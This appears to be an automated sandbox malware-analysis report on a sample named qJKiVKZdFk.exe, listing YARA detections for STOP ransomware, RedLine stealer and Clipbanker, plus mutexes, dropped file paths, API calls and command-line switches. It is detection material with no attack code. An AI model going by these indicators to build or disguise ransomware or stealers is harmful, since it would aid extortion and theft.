            Source: 2.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 2.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 8.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 8.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 2.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 2.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000016.00000002.1457933535.00000000009AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000028.00000002.2121357448.0000000000971000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000019.00000002.1457594095.000000000444C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000007.00000002.1251680142.0000000004488000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001F.00000002.1490235775.000000000422E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000026.00000002.1929992675.000000000443A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000015.00000002.1385315034.0000000005E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000020.00000002.1505470760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0000001F.00000002.1490507183.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001E.00000002.1577294491.00000000008CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000026.00000002.1930318065.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000012.00000002.1332771724.0000000001AEE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000015.00000002.1384952175.0000000004413000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000005.00000002.1244558596.0000000004458000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: Process Memory Space: qJKiVKZdFk.exe PID: 3076, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: qJKiVKZdFk.exe PID: 6692, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: qJKiVKZdFk.exe PID: 4216, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@44/1377@10/5
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_044157C6 CreateToolhelp32Snapshot,Module32First,0_2_044157C6
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251edJump to behavior
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:644:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: --Admin2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: IsAutoStart2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: IsTask2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: --ForNetRes2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: IsAutoStart2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: IsTask2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: --Task2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: --AutoStart2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: --Service2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCommand line argument: X1P2_2_00419F90
